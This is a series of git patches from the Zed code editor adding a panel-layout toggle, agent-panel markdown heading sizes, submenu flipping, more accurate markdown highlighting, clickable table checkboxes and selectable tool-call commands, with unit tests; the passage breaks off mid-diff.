https://github.com/zed-industries/zed/issues/54545 With the release of the parallel agents feature, we changed the default panel positions optimizing for an agentic-first layout. Even though we introduced a settings backfill _and_ the ability to revert after interacting with the announcement toast, this change seems to be causing a bit of frustration still. In response, this PR adds a "Panel Layout" menu in the user menu that allows to quickly toggle between the "Classic" layout and the "Agentic" layout. If you have a different set up, you'll see a "custom" item there just confirming that. | Panel Layout | Custom set up | |--------|--------| | Screenshot 2026-04-24 at 12 
52@2x | Screenshot 2026-04-24 at 12 
55@2x | Release Notes: - Added a menu item in the user menu called "Panel Layout" which offers the ability to quickly swap between the two standard panel layouts: classic (project panel, git panel, etc., on the left) and agentic (agent panel on the left, everything else on the right). --- Cargo.lock | 2 ++ crates/title_bar/Cargo.toml | 2 ++ crates/title_bar/src/title_bar.rs | 52 +++++++++++++++++++++++++++++-- 3 files changed, 54 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0c029906834738..5ae684b0a5c336 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -18163,6 +18163,7 @@ checksum = "1f3ccbac311fea05f86f61904b462b55fb3df8837a366dfc601a0161d0532f20" name = "title_bar" version = "0.1.0" dependencies = [ + "agent_settings", "anyhow", "arrayvec", "auto_update", @@ -18172,6 +18173,7 @@ dependencies = [ "client", "cloud_api_types", "db", + "fs", "git_ui", "gpui", "icons", diff --git a/crates/title_bar/Cargo.toml b/crates/title_bar/Cargo.toml index ed7b64c3c18f3c..f4850fe5c8adcd 100644 --- a/crates/title_bar/Cargo.toml +++ b/crates/title_bar/Cargo.toml @@ -29,8 +29,10 @@ test-support = [ ] [dependencies] +agent_settings.workspace = true anyhow.workspace = true auto_update.workspace = true +fs.workspace = true platform_title_bar.workspace = true call.workspace = true channel.workspace = true diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 8edfca67349618..988c8a7c6f492e 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -7,6 +7,7 @@ mod update_version; use crate::application_menu::{ApplicationMenu, show_menus}; use crate::plan_chip::PlanChip; +use agent_settings::{AgentSettings, WindowLayout}; use arrayvec::ArrayVec; use git_ui::worktree_picker::WorktreePicker; pub use platform_title_bar::{ @@ -44,8 +45,8 @@ use std::time::Duration; use theme::ActiveTheme; use title_bar_settings::TitleBarSettings; use ui::{ - Avatar, ButtonLike, ContextMenu, IconWithIndicator, Indicator, PopoverMenu, PopoverMenuHandle, - TintColor, Tooltip, prelude::*, utils::platform_title_bar_height, + Avatar, ButtonLike, ContextMenu, ContextMenuEntry, IconWithIndicator, Indicator, PopoverMenu, + PopoverMenuHandle, TintColor, Tooltip, prelude::*, utils::platform_title_bar_height, }; use update_version::UpdateVersion; use util::ResultExt; @@ -1202,6 +1203,13 @@ impl TitleBar { let organizations = organizations.clone(); let user_store = user_store.clone(); + let ai_enabled = !project::DisableAiSettings::get_global(cx).disable_ai; + let current_layout = AgentSettings::get_layout(cx); + let is_editor = matches!(current_layout, WindowLayout::Editor(_)); + let is_agent = matches!(current_layout, WindowLayout::Agent(_)); + let is_custom = matches!(current_layout, WindowLayout::Custom(_)); + let fs = ::global(cx); + ContextMenu::build(window, cx, |menu, _, _cx| { menu.when(is_signed_in, |this| { let user_login = user_login.clone(); @@ -1311,6 +1319,46 @@ impl TitleBar { "Extensions", zed_actions::Extensions::default().boxed_clone(), ) + .when(ai_enabled, |menu| { + let fs = fs.clone(); + menu.separator() + .submenu("Panel Layout", move |menu, _window, _cx| { + let fs = fs.clone(); + menu.toggleable_entry( + "Classic", + is_editor, + IconPosition::Start, + None, + { + let fs = fs.clone(); + move |_window, cx| { + drop(AgentSettings::set_layout( + WindowLayout::Editor(None), + fs.clone(), + cx, + )); + } + }, + ) + .toggleable_entry("Agentic", is_agent, IconPosition::Start, None, { + let fs = fs.clone(); + move |_window, cx| { + drop(AgentSettings::set_layout( + WindowLayout::Agent(None), + fs.clone(), + cx, + )); + } + }) + .when(is_custom, |menu| { + menu.item( + ContextMenuEntry::new("Custom") + .toggleable(IconPosition::Start, true) + .disabled(true), + ) + }) + }) + }) .when(is_signed_in, |this| { this.separator() .action("Sign Out", client::SignOut.boxed_clone()) From 8925d1285188fb21705063ec549353f9795888c8 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:29 -0300 Subject: [PATCH 014/231] agent_ui: Fix markdown heading sizes (#54766) Follow up to https://github.com/zed-industries/zed/pull/54374 as that removed the custom heading styles that were mostly tailored to the agent panel. It makes sense for those values not to be the ones used for general markdown rendering, but I think it's just too big for the agent panel. So I'm sort of hijacking the `MarkdownFont::Agent` enum here so that we can set it conditionally to just the agent context. Release Notes: - N/A --- crates/markdown/src/markdown.rs | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index fce79630c8d438..e6c046645ce9ff 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -265,6 +265,34 @@ impl MarkdownStyle { }), ..Default::default() }, + heading_level_styles: matches!(font, MarkdownFont::Agent).then_some( + HeadingLevelStyles { + h1: Some(TextStyleRefinement { + font_size: Some(rems(1.15).into()), + ..Default::default() + }), + h2: Some(TextStyleRefinement { + font_size: Some(rems(1.1).into()), + ..Default::default() + }), + h3: Some(TextStyleRefinement { + font_size: Some(rems(1.05).into()), + ..Default::default() + }), + h4: Some(TextStyleRefinement { + font_size: Some(rems(1.).into()), + ..Default::default() + }), + h5: Some(TextStyleRefinement { + font_size: Some(rems(0.95).into()), + ..Default::default() + }), + h6: Some(TextStyleRefinement { + font_size: Some(rems(0.875).into()), + ..Default::default() + }), + }, + ), ..Default::default() } } From ac7c76b4773629a0d151093a6bd226a974549086 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:36 -0300 Subject: [PATCH 015/231] ui: Improve submenu rendering when there's not enough space (#54773) This PR makes the submenu render on the left of the trigger if there's not enough space (200px of available width) on the right. This improves the rendering overall, I believe, as it's better than the submenu rendering _on top_ of the parent menu. Release Notes: - N/A --- crates/ui/src/components/context_menu.rs | 47 +++++++++++++++++++----- 1 file changed, 37 insertions(+), 10 deletions(-) diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index c82b05a98a3493..c8f330526df4d1 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -26,6 +26,7 @@ struct OpenSubmenu { entity: Entity, trigger_bounds: Option>, offset: Option, + flip_left: bool, _dismiss_subscription: Subscription, } @@ -1301,6 +1302,11 @@ impl ContextMenu { let (submenu, dismiss_subscription) = Self::create_submenu(builder, cx.entity(), window, cx); + let flip_left = self + .main_menu_observed_bounds + .get() + .is_some_and(|bounds| bounds.right() + px(200.0) > window.viewport_size().width); + // If we're switching from one submenu item to another, throw away any previously-captured // offset so we don't reuse a stale position. self.main_menu_observed_bounds.set(None); @@ -1322,6 +1328,7 @@ impl ContextMenu { entity: submenu, trigger_bounds, offset: None, + flip_left, _dismiss_subscription: dismiss_subscription, }); @@ -1665,6 +1672,7 @@ impl ContextMenu { ix: usize, submenu: Entity, offset: Pixels, + flip_left: bool, cx: &mut Context, ) -> impl IntoElement { let bounds_cell = self.main_menu_observed_bounds.clone(); @@ -1684,9 +1692,9 @@ impl ContextMenu { div() .id(("submenu-container", ix)) .absolute() - .left_full() - .ml_neg_0p5() .top(offset) + .when(flip_left, |this| this.right_full().mr_neg_0p5()) + .when(!flip_left, |this| this.left_full().ml_neg_0p5()) .on_hover(cx.listener(|this, hovered, _, _| { if *hovered { this.hover_target = HoverTarget::Submenu; @@ -1694,7 +1702,11 @@ impl ContextMenu { })) .child( anchored() - .anchor(Anchor::TopLeft) + .anchor(if flip_left { + Anchor::TopRight + } else { + Anchor::TopLeft + }) .snap_to_window_with_margin(px(8.0)) .child( div() @@ -2093,7 +2105,12 @@ impl Render for ContextMenu { } focus_submenu = Some(open_submenu.entity.read(cx).focus_handle.clone()); - Some((open_submenu.item_index, open_submenu.entity.clone(), offset)) + Some(( + open_submenu.item_index, + open_submenu.entity.clone(), + offset, + open_submenu.flip_left, + )) } else { None } @@ -2262,9 +2279,14 @@ impl Render for ContextMenu { .child(render_aside(aside, cx)) })) }) - .when_some(submenu_container, |this, (ix, submenu, offset)| { - this.child(self.render_submenu_container(ix, submenu, offset, cx)) - }) + .when_some( + submenu_container, + |this, (ix, submenu, offset, flip_left)| { + this.child( + self.render_submenu_container(ix, submenu, offset, flip_left, cx), + ) + }, + ) } else { v_flex() .w_full() @@ -2273,9 +2295,14 @@ impl Render for ContextMenu { .justify_end() .children(aside.map(|(_, aside)| render_aside(aside, cx))) .child(render_menu(cx, window)) - .when_some(submenu_container, |this, (ix, submenu, offset)| { - this.child(self.render_submenu_container(ix, submenu, offset, cx)) - }) + .when_some( + submenu_container, + |this, (ix, submenu, offset, flip_left)| { + this.child( + self.render_submenu_container(ix, submenu, offset, flip_left, cx), + ) + }, + ) } } } From 4e882cdd3a95c45e1688f45e40f17fd75b182119 Mon Sep 17 00:00:00 2001 From: Tim Vermeulen Date: Fri, 24 Apr 2026 14:51:52 +0200 Subject: [PATCH 016/231] markdown: Make highlighting of rendered markdown more accurate (#54744) Paints selections and search highlights of rendered markdown more accurately, to properly match what's actually being selected. Particularly noticeable when the selection spans multiple rows in a table cell or when it starts right after a soft wrap. |Before|After| | --- | --- | |before | after | Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed selection and search highlights in rendered markdown not always being displayed accurately. --- crates/markdown/src/markdown.rs | 199 +++++++++++++++++++++----------- 1 file changed, 129 insertions(+), 70 deletions(-) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index e6c046645ce9ff..c7f11ebb68d04d 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -1288,82 +1288,27 @@ impl MarkdownElement { } fn paint_highlight_range( - bounds: Bounds, start: usize, end: usize, color: Hsla, rendered_text: &RenderedText, window: &mut Window, ) { - let start_pos = rendered_text.position_for_source_index(start); - let end_pos = rendered_text.position_for_source_index(end); - if let Some(((start_position, start_line_height), (end_position, end_line_height))) = - start_pos.zip(end_pos) - { - if start_position.y == end_position.y { - window.paint_quad(quad( - Bounds::from_corners( - start_position, - point(end_position.x, end_position.y + end_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } else { - window.paint_quad(quad( - Bounds::from_corners( - start_position, - point(bounds.right(), start_position.y + start_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - - if end_position.y > start_position.y + start_line_height { - window.paint_quad(quad( - Bounds::from_corners( - point(bounds.left(), start_position.y + start_line_height), - point(bounds.right(), end_position.y), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } - - window.paint_quad(quad( - Bounds::from_corners( - point(bounds.left(), end_position.y), - point(end_position.x, end_position.y + end_line_height), - ), - Pixels::ZERO, - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), - )); - } + for bounds in rendered_text.bounds_for_source_range(start..end) { + window.paint_quad(quad( + bounds, + Pixels::ZERO, + color, + Edges::default(), + Hsla::transparent_black(), + BorderStyle::default(), + )); } } - fn paint_selection( - &self, - bounds: Bounds, - rendered_text: &RenderedText, - window: &mut Window, - cx: &mut App, - ) { + fn paint_selection(&self, rendered_text: &RenderedText, window: &mut Window, cx: &mut App) { let selection = self.markdown.read(cx).selection.clone(); Self::paint_highlight_range( - bounds, selection.start, selection.end, self.style.selection_background_color, @@ -1374,7 +1319,6 @@ impl MarkdownElement { fn paint_search_highlights( &self, - bounds: Bounds, rendered_text: &RenderedText, window: &mut Window, cx: &mut App, @@ -1390,7 +1334,6 @@ impl MarkdownElement { colors.search_match_background }; Self::paint_highlight_range( - bounds, highlight_range.start, highlight_range.end, color, @@ -2268,7 +2211,7 @@ impl Element for MarkdownElement { &mut self, _id: Option<&GlobalElementId>, _inspector_id: Option<&gpui::InspectorElementId>, - bounds: Bounds, + _bounds: Bounds, rendered_markdown: &mut Self::RequestLayoutState, hitbox: &mut Self::PrepaintState, window: &mut Window, @@ -2298,8 +2241,8 @@ impl Element for MarkdownElement { self.paint_mouse_listeners(hitbox, &rendered_markdown.text, window, cx); rendered_markdown.element.paint(window, cx); - self.paint_search_highlights(bounds, &rendered_markdown.text, window, cx); - self.paint_selection(bounds, &rendered_markdown.text, window, cx); + self.paint_search_highlights(&rendered_markdown.text, window, cx); + self.paint_selection(&rendered_markdown.text, window, cx); } } @@ -2917,6 +2860,78 @@ struct RenderedFootnoteRef { } impl RenderedText { + fn bounds_for_source_range(&self, range: Range) -> Vec> { + let mut all_bounds = Vec::new(); + + for line in self.lines.iter() { + let line_source_start = line.source_mappings.first().unwrap().source_index; + if line_source_start >= range.end { + break; + } + if line.source_end <= range.start { + continue; + } + + let layout = &line.layout; + let line_bounds = layout.bounds(); + let line_height = layout.line_height(); + + let rendered_start = + line.rendered_index_for_source_index(range.start.max(line_source_start)); + let rendered_end = line.rendered_index_for_source_index(range.end.min(line.source_end)); + + let mut wrapped_line_start = 0; + let mut row_top = line_bounds.top(); + + while wrapped_line_start < rendered_end { + let Some(wrapped_line) = layout.line_layout_for_index(wrapped_line_start) else { + break; + }; + + let unwrapped_layout = &wrapped_line.unwrapped_layout; + let wrapped_line_end = wrapped_line_start + wrapped_line.len(); + + let row_ends = wrapped_line + .wrap_boundaries() + .iter() + .map(|wrap_boundary| { + let glyph = &unwrapped_layout.runs[wrap_boundary.run_ix].glyphs + [wrap_boundary.glyph_ix]; + (wrapped_line_start + glyph.index, glyph.position.x) + }) + .chain([(wrapped_line_end, unwrapped_layout.width)]); + + let mut row_start = wrapped_line_start; + let mut row_start_x = Pixels::ZERO; + + for (row_end, row_end_x) in row_ends { + let selection_start = rendered_start.max(row_start); + let selection_end = rendered_end.min(row_end); + + if selection_start < selection_end { + let x_for_index = |index| { + line_bounds.left() + + unwrapped_layout.x_for_index(index - wrapped_line_start) + - row_start_x + }; + all_bounds.push(Bounds::from_corners( + point(x_for_index(selection_start), row_top), + point(x_for_index(selection_end), row_top + line_height), + )); + } + + row_start = row_end; + row_start_x = row_end_x; + row_top += line_height; + } + + wrapped_line_start = wrapped_line_end + 1; + } + } + + all_bounds + } + fn source_index_for_position(&self, position: Point) -> Result { let mut lines = self.lines.iter().peekable(); let mut fallback_line: Option<&RenderedLine> = None; @@ -3744,6 +3759,50 @@ mod tests { } } + #[gpui::test] + fn test_bounds_for_source_range_skips_gaps_between_rendered_lines(cx: &mut TestAppContext) { + let source = "First\n\nSecond"; + let rendered = render_markdown(source, cx); + let highlight_bounds = rendered.bounds_for_source_range(0..source.len()); + assert_eq!(highlight_bounds.len(), rendered.lines.len()); + + for (line, highlight_bounds) in rendered.lines.iter().zip(highlight_bounds.iter()) { + let line_bounds = line.layout.bounds(); + assert_eq!(highlight_bounds.top(), line_bounds.top()); + assert_eq!( + highlight_bounds.bottom(), + line_bounds.top() + line.layout.line_height() + ); + } + } + + #[gpui::test] + fn test_bounds_for_source_range_returns_one_bound_per_soft_wrap_row(cx: &mut TestAppContext) { + let sentence = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, \ + sed do eiusmod tempor incididunt ut labore et dolore magna aliqua."; + let source = [sentence, sentence, sentence, sentence].join(" "); + let rendered = render_markdown(&source, cx); + let line = &rendered.lines[0]; + let line_bounds = line.layout.bounds(); + let line_height = line.layout.line_height(); + let wrapped_line = line.layout.line_layout_for_index(0).unwrap(); + let visual_row_count = wrapped_line.wrap_boundaries().len() + 1; + + let highlight_bounds = rendered.bounds_for_source_range(0..source.len()); + assert_eq!(highlight_bounds.len(), visual_row_count); + + let mut row_top = line_bounds.top(); + for (row_index, row_bounds) in highlight_bounds.iter().enumerate() { + assert_eq!(row_bounds.top(), row_top); + assert_eq!(row_bounds.bottom(), row_top + line_height); + assert!( + row_bounds.size.width > Pixels::ZERO, + "row {row_index} should have a non-empty highlight" + ); + row_top += line_height; + } + } + #[gpui::test] fn test_heading_font_sizes_are_distinct(cx: &mut TestAppContext) { let rendered = render_markdown("# H1\n\n## H2\n\n### H3\n\nBody text", cx); From e615d14b70699245e88751af867454178f7371b4 Mon Sep 17 00:00:00 2001 From: iam-liam <117163129+iam-liam@users.noreply.github.com> Date: Fri, 24 Apr 2026 14:02:06 +0100 Subject: [PATCH 017/231] markdown: Make table cell checkboxes clickable (#54747) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes #53587 Follow-up to #50595. [#50595](https://github.com/zed-industries/zed/pull/50595) added display-only checkboxes when `[x]` / `[X]` / `[ ]` appears as the sole content of a markdown table cell. That PR called out interactivity as a later step — this PR delivers it. https://github.com/user-attachments/assets/c666ee4c-7e31-4450-ab33-c07c82949818 ## What this does When a consumer of `MarkdownElement` supplies an `on_checkbox_toggle` callback, table-cell checkboxes now invoke it on click with the source range of the `[x]` / `[ ]` marker and the new checked state. This mirrors the existing list-item checkbox path. For markdown preview (`markdown_preview_view.rs`) the callback is already wired to edit the source buffer, so clicking a checkbox in a previewed `.md` file now flips `[x]` to `[ ]` and back in the file, the same as it already did for list checkboxes. ## How it works `replace_pending_checkbox` previously took the cell's outer source range and always built a visualization-only checkbox. It now takes the optional toggle callback instead, and reconstructs the marker's exact source range from `pending_line.source_mappings` — pulldown-cmark emits `[x]` in a table cell as three separate `Text` events, so the per-chunk mappings are needed to recover the 3-character range to rewrite. If a callback was supplied, the checkbox attaches an `on_click` that invokes it with that range and `!checked`; otherwise it falls back to the prior visualization-only rendering. Two free helpers (`source_range_for_rendered` / `source_index_for_rendered`) were extracted so the mapping logic is unit-testable. ## Scope One file: `crates/markdown/src/markdown.rs`. No changes to `markdown_preview` — since #52008 it renders through the shared `MarkdownElement`, so its existing `on_checkbox_toggle` wiring picks up table checkboxes for free. ## Relation to #53587 [#53587](https://github.com/zed-industries/zed/issues/53587) reports that markdown checkboxes in the **agent panel** can't be clicked. This PR is a necessary piece of that fix — without it, even if the agent panel wired `on_checkbox_toggle`, its table checkboxes would stay inert. It does not fully close #53587 on its own: the agent panel's `MarkdownElement` instances in `conversation_view.rs` / `thread_view.rs` don't currently wire `on_checkbox_toggle`, and wiring it there requires deciding how clicks should mutate the in-memory agent response (no source file to edit into). That's a follow-up. ## Test plan **Unit tests** (2 new, both in `crates/markdown/src/markdown.rs`): - `test_table_checkbox_marker_source_range` — walks parser events for a table with checkboxes, replays what the builder accumulates, and asserts the reconstructed source range slices to exactly `[x]` / `[ ]` in the original markdown (including a padded-whitespace case). - `test_source_range_for_rendered_handles_split_chunks` — pins the mapping helper against the three-chunk layout pulldown-cmark produces. **Automated**: - [x] `cargo test -p markdown` — 46 tests pass (44 existing + 2 new) - [x] `cargo test -p markdown_preview` — 3 tests pass - [x] `./script/clippy -p markdown` — clean **Manual** (against a preview of a markdown file with checkbox tables): - [x] Click a checked `[x]` table cell — it becomes `[ ]` in the source and rerenders as unchecked - [x] Click an unchecked `[ ]` — becomes `[x]` - [x] Uppercase `[X]` toggles on click (replacement writes `[x]` / `[ ]`, matching the list-item behaviour) - [x] Padded-whitespace cells still target just the three marker characters - [x] Multiple checkbox columns in one table all independently clickable - [x] Alignment variants (left/center/right) behave the same - [x] Non-checkbox table text unaffected - [x] List-item checkboxes continue to work (regression) Release Notes: - Made table-cell markdown checkboxes clickable in markdown preview, matching list-item checkbox behavior Co-authored-by: Lukas Wirth --- crates/markdown/src/markdown.rs | 168 ++++++++++++++++++++++++++++---- 1 file changed, 148 insertions(+), 20 deletions(-) diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index c7f11ebb68d04d..2fd0eb692d0c55 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -2102,7 +2102,7 @@ impl Element for MarkdownElement { builder.table.end_row(); } MarkdownTagEnd::TableCell => { - builder.replace_pending_checkbox(range); + builder.replace_pending_checkbox(self.on_checkbox_toggle.clone()); builder.pop_div(); builder.table.end_cell(); } @@ -2660,26 +2660,53 @@ impl MarkdownElementBuilder { } } - fn replace_pending_checkbox(&mut self, source_range: &Range) { - let trimmed = self.pending_line.text.trim(); - if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { - let checked = trimmed != "[ ]"; - self.pending_line = PendingLine::default(); - let checkbox = Checkbox::new( - ElementId::Name( - format!("table_checkbox_{}_{}", source_range.start, source_range.end).into(), - ), - if checked { - ToggleState::Selected - } else { - ToggleState::Unselected - }, - ) - .fill() - .visualization_only(true) - .into_any_element(); - self.div_stack.last_mut().unwrap().extend([checkbox]); + fn replace_pending_checkbox(&mut self, on_toggle: Option) { + let text = &self.pending_line.text; + let trimmed = text.trim(); + if trimmed != "[x]" && trimmed != "[X]" && trimmed != "[ ]" { + return; } + let checked = trimmed != "[ ]"; + + let leading_ws = text.len() - text.trim_start().len(); + let marker_rendered = leading_ws..leading_ws + trimmed.len(); + let marker_source = self + .source_range_for_rendered(&marker_rendered) + .expect("pending checkbox text must have source mappings"); + + self.pending_line = PendingLine::default(); + + let toggle_state = if checked { + ToggleState::Selected + } else { + ToggleState::Unselected + }; + let checkbox = Checkbox::new( + ElementId::Name( + format!( + "table_checkbox_{}_{}", + marker_source.start, marker_source.end + ) + .into(), + ), + toggle_state, + ) + .fill(); + + let element = if let Some(on_toggle) = on_toggle { + checkbox + .on_click(move |_state, window, cx| { + on_toggle(marker_source.clone(), !checked, window, cx); + }) + .into_any_element() + } else { + checkbox.visualization_only(true).into_any_element() + }; + self.div_stack.last_mut().unwrap().extend([element]); + } + + fn source_range_for_rendered(&self, rendered: &Range) -> Option> { + source_range_for_rendered(&self.pending_line.source_mappings, rendered) } fn render_source_anchor(&mut self, source_range: Range) -> AnyElement { @@ -2835,6 +2862,30 @@ struct SourceMapping { source_index: usize, } +fn source_range_for_rendered( + mappings: &[SourceMapping], + rendered: &Range, +) -> Option> { + if rendered.start >= rendered.end { + return None; + } + let start = source_index_for_rendered(mappings, rendered.start)?; + let end = source_index_for_rendered(mappings, rendered.end - 1)? + 1; + Some(start..end) +} + +fn source_index_for_rendered(mappings: &[SourceMapping], rendered_index: usize) -> Option { + let mut last: Option<&SourceMapping> = None; + for mapping in mappings { + if mapping.rendered_index <= rendered_index { + last = Some(mapping); + } else { + break; + } + } + last.map(|m| m.source_index + (rendered_index - m.rendered_index)) +} + pub struct RenderedMarkdown { element: AnyElement, text: RenderedText, @@ -3414,6 +3465,83 @@ mod tests { assert_eq!(checkbox_cells[1].trim(), "[ ]"); } + #[test] + fn test_table_checkbox_marker_source_range() { + let md = "| Done |\n|------|\n| [x] |\n| [ ] |"; + let events = crate::parser::parse_markdown_with_options(md, false, false).events; + + let mut in_cell = false; + let mut pending_text = String::new(); + let mut mappings: Vec = Vec::new(); + let mut cell_ranges: Vec> = Vec::new(); + + for (range, event) in &events { + match event { + MarkdownEvent::Start(MarkdownTag::TableCell) => { + in_cell = true; + pending_text.clear(); + mappings.clear(); + } + MarkdownEvent::End(MarkdownTagEnd::TableCell) => { + if in_cell { + let trimmed = pending_text.trim(); + if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { + let leading = pending_text.len() - pending_text.trim_start().len(); + let rendered = leading..leading + trimmed.len(); + let marker_source = source_range_for_rendered(&mappings, &rendered) + .expect("marker source range"); + cell_ranges.push(marker_source); + } + } + in_cell = false; + } + MarkdownEvent::Text if in_cell => { + mappings.push(SourceMapping { + rendered_index: pending_text.len(), + source_index: range.start, + }); + pending_text.push_str(&md[range.clone()]); + } + _ => {} + } + } + + assert_eq!(cell_ranges.len(), 2); + for marker_range in &cell_ranges { + let slice = &md[marker_range.clone()]; + assert!( + slice == "[x]" || slice == "[X]" || slice == "[ ]", + "expected `[x]`/`[X]`/`[ ]`, got {slice:?} at {marker_range:?}" + ); + } + } + + #[test] + fn test_source_range_for_rendered_handles_split_chunks() { + let mappings = vec![ + SourceMapping { + rendered_index: 0, + source_index: 20, + }, + SourceMapping { + rendered_index: 1, + source_index: 21, + }, + SourceMapping { + rendered_index: 2, + source_index: 22, + }, + ]; + + let range = source_range_for_rendered(&mappings, &(0..3)).unwrap(); + assert_eq!(range, 20..23); + + let range = source_range_for_rendered(&mappings, &(1..2)).unwrap(); + assert_eq!(range, 21..22); + + assert_eq!(source_range_for_rendered(&mappings, &(2..2)), None); + } + #[gpui::test] fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) { // Test that double-clicking on inline code selects just the code content, From 57d7632b28f0303be546357fc6808bda242d1049 Mon Sep 17 00:00:00 2001 From: Kunall Banerjee Date: Fri, 24 Apr 2026 09:54:28 -0400 Subject: [PATCH 018/231] agent_ui: Allow selection of commands from tool calls (#50545) Closes #50427. Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) The changes respect your current theme + mimic the existing UI when it comes to font size+weight. image https://github.com/user-attachments/assets/a5fb6c82-fffd-494f-a374-9296d1690736 Release Notes: - Allow selection of commands from tool calls --- crates/agent_ui/src/conversation_view.rs | 4 +- .../src/conversation_view/thread_view.rs | 101 ++++++++++-------- crates/markdown/src/markdown.rs | 9 ++ 3 files changed, 68 insertions(+), 46 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 96b963de19cdc1..a32eaed2ddfdf8 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -38,7 +38,9 @@ use gpui::{ }; use language::Buffer; use language_model::{LanguageModelCompletionError, LanguageModelRegistry}; -use markdown::{Markdown, MarkdownElement, MarkdownFont, MarkdownStyle}; +use markdown::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownFont, MarkdownStyle, +}; use parking_lot::RwLock; use project::{AgentId, AgentServerStore, Project, ProjectEntryId}; use prompt_store::{PromptId, PromptStore}; diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 439d5f19290f51..34699d15a064d3 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -5910,42 +5910,58 @@ impl ThreadView { &self, group: SharedString, is_preview: bool, - command_source: &str, + command: Entity, + window: &Window, cx: &Context, ) -> Div { - v_flex() - .group(group.clone()) - .p_1p5() - .bg(self.tool_card_header_bg(cx)) - .when(is_preview, |this| { - this.pt_1().child( - // Wrapping this label on a container with 24px height to avoid - // layout shift when it changes from being a preview label - // to the actual path where the command will run in - h_flex().h_6().child( - Label::new("Run Command") - .buffer_font(cx) - .size(LabelSize::XSmall) - .color(Color::Muted), - ), - ) - }) - .children(command_source.lines().map(|line| { - let text: SharedString = if line.is_empty() { - " ".into() - } else { - line.to_string().into() - }; + // The label's markdown source is a fenced code block (```\n...\n```); + // strip the fences so the copy button yields just the command text. + let command_source = command.read(cx).source(); + let command_text = command_source + .strip_prefix("```\n") + .and_then(|s| s.strip_suffix("\n```")) + .unwrap_or(&command_source) + .to_string(); - Label::new(text).buffer_font(cx).size(LabelSize::Small) - })) - .child( - div().absolute().top_1().right_1().child( - CopyButton::new("copy-command", command_source.to_string()) - .tooltip_label("Copy Command") - .visible_on_hover(group), + let mut style = MarkdownStyle::themed(MarkdownFont::Agent, window, cx).with_buffer_font(cx); + style.container_style.text.font_size = Some(rems_from_px(12.).into()); + style.container_style.text.line_height = Some(rems_from_px(17.).into()); + style.height_is_multiple_of_line_height = true; + + let header_bg = self.tool_card_header_bg(cx); + let run_command_label = if is_preview { + Some( + h_flex().h_6().child( + Label::new("Run Command") + .buffer_font(cx) + .size(LabelSize::XSmall) + .color(Color::Muted), ), ) + } else { + None + }; + // Suppress the code block's built-in copy button so we don't stack two + // copy buttons on top of each other; the outer button below is the one + // we want, because it copies the unfenced command text. + let markdown_element = + self.render_markdown(command, style) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }); + let copy_button = CopyButton::new("copy-command", command_text) + .tooltip_label("Copy Command") + .visible_on_hover(group.clone()); + + v_flex() + .group(group) + .relative() + .p_1p5() + .bg(header_bg) + .when(is_preview, |this| this.pt_1().children(run_command_label)) + .child(markdown_element) + .child(div().absolute().top_1().right_1().child(copy_button)) } fn render_terminal_tool_call( @@ -5961,7 +5977,6 @@ impl ThreadView { ) -> AnyElement { let terminal_data = terminal.read(cx); let working_dir = terminal_data.working_dir(); - let command = terminal_data.command(); let started_at = terminal_data.started_at(); let tool_failed = matches!( @@ -6012,17 +6027,13 @@ impl ThreadView { .map(|path| path.display().to_string()) .unwrap_or_else(|| "current directory".to_string()); - // Since the command's source is wrapped in a markdown code block - // (```\n...\n```), we need to strip that so we're left with only the - // command's content. - let command_source = command.read(cx).source(); - let command_content = command_source - .strip_prefix("```\n") - .and_then(|s| s.strip_suffix("\n```")) - 